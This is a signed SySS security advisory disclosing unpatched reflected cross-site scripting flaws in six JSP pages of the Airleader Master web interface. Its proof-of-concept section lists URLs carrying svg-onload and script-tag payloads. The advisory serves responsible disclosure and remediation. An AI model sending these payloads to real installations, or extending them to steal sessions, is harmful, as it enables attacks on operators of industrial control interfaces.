-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA512

Advisory ID:               SYSS-2025-045
Product:                   Airleader Master
Manufacturer:              Airleader WF Steuerungstechnik GmbH
Affected Version(s):       <= 6.381
Tested Version(s):         6.381
Vulnerability Type:        Cross-Site Scripting (CWE-79)
Risk Level:                Medium
Solution Status:           Unresolved
Manufacturer Notification: 2025-07-08
Solution Date:             -
Public Disclosure:         2026-03-03
CVE Reference:             Not yet assigned
Author of Advisory:        Angel Lomeli, SySS GmbH

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Overview:

Airleader Master (see [1]) is a management software for large hardware modules
used to control compressed air stations, mainly used in the manufacturing
industry. The units are focused on efficiency and economization of resources,
allowing for the measuring and control of compressed air quality. They include
embedded web interfaces for data visualization and management.

The application includes multiple reflected cross-site scripting (RXSS)
vulnerabilities, which could be abused to attack other users of the web
application.

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Vulnerability Details:

The web application reflects values from parameters without any kind of
filtering or escaping in multiple pages, resulting in multiple instances
of RXSS.

In an RXSS attack, the attacker injects a malicious script into a website.
The script is reflected back to the victim user's browser, typically through
a crafted URL the user is tricked into clicking. This allows the attacker to
execute arbitrary scripts within the user's session to perform different kinds
of client-side attacks, such as stealing cookies. The injected code is not
permanently stored on the web server.

The following pages are affected:
#1. /wizard1.jsp
#2. /wizard2.jsp
#3. /wizard3.jsp
#4. /wizard4.jsp
#5. /selectDataDir.jsp
#6. /wizard_write.jsp

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Proof of Concept (PoC):

#1. /wizard1.jsp
Vulnerable parameters: station
PoC:
http://<host>/wizard1.jsp?station="%2f><svg%2fonload%3dalert(document.domain)>

#2. /wizard2.jsp
Vulnerable parameters: station
PoC:
http://<host>/wizard2.jsp?station="%2f><svg%2fonload%3dalert(document.domain)>

#3. /wizard3.jsp
Vulnerable parameters: station, appdir, host
PoC:
http://<host>/wizard3.jsp?host="%2f><svg%2fonload%3dalert(document.domain)>

#4. /wizard4.jsp
Vulnerable parameters: station, appdir, host, model, mess, offline
PoC:
http://<host>/wizard4.jsp?model="%2f><svg%2fonload%3dalert(document.domain)>

#5. /selectDataDir.jsp
Vulnerable parameters: path
PoC:
http://<host>/selectDataDir.jsp?cmd=save&path=<svg%2fonload=alert(document.domain)>

#6. /wizard_write.jsp
Vulnerable parameters: station, appdir, host
PoC:
http://<host>/wizard_write.jsp?appdir="><script>alert(document.domain)<%2fscript>

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Solution:

The vendor has not yet released a security update. The web application should
escape all user-controlled input in a context-sensitive manner before reflecting
it back to the user. Many frameworks offer specialized methods for this
utilization case. Otherwise, documents such as the OWASP's Cross Site Scripting
Prevention Cheat Sheet (see [4]) should be consulted for good coding practices.

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Disclosure Timeline:

2025-06-18: Vulnerability discovered
2025-07-08: Vulnerability reported to manufacturer
2025-07-15: Contact retry
2026-03-03: Public disclosure of vulnerability

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

References:

[1] Product website for Airleader modules
    https://www.airleader.de/produkte
[2] SySS Security Advisory SYSS-2025-045
    https://www.syss.de/fileadmin/dokumente/Publikationen/Advisories/SYSS-2025-045.txt
[3] SySS Responsible Disclosure Policy
    https://www.syss.de/en/responsible-disclosure-policy
[4] OWASP's Cross Site Scripting Prevention Cheat Sheet
    https://github.com/OWASP/CheatSheetSeries/blob/master/cheatsheets/Cross_Site_Scripting_Prevention_Cheat_Sheet.md

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Credits:

This security vulnerability was found by:

E-Mail: angel.lomeli@syss.de
Public Key: https://www.syss.de/fileadmin/dokumente/PGPKeys/Angel_Lomeli.asc
Key ID: 0x3511BA21C68F0D7A
Key Fingerprint: A081 85AB C051 78ED CE8A F8E2 3511 BA21 C68F 0D7A

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Disclaimer:

The information provided in this security advisory is provided "as is"
and without warranty of any kind. Details of this security advisory may
be updated in order to provide as accurate information as possible. The
latest version of this security advisory is available on the SySS website.

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Copyright:

Creative Commons - Attribution (by) - Version 4.0
URL: https://creativecommons.org/licenses/by/4.0/deed.en

-----BEGIN PGP SIGNATURE-----

iHUEARYKAB0WIQSggYWrwFF47c6K+OI1Ebohxo8NegUCaaBTUgAKCRA1Ebohxo8N
eoNiAQDuA8JQLKczV7Uh1edZPPUvf3NISF2XXhOu4XIyIqEItgD+JvIail3pyDW9
C9LJfZRF+NSb1b/o8cu3/Jq9CjQRNQ0=
=xfds
-----END PGP SIGNATURE-----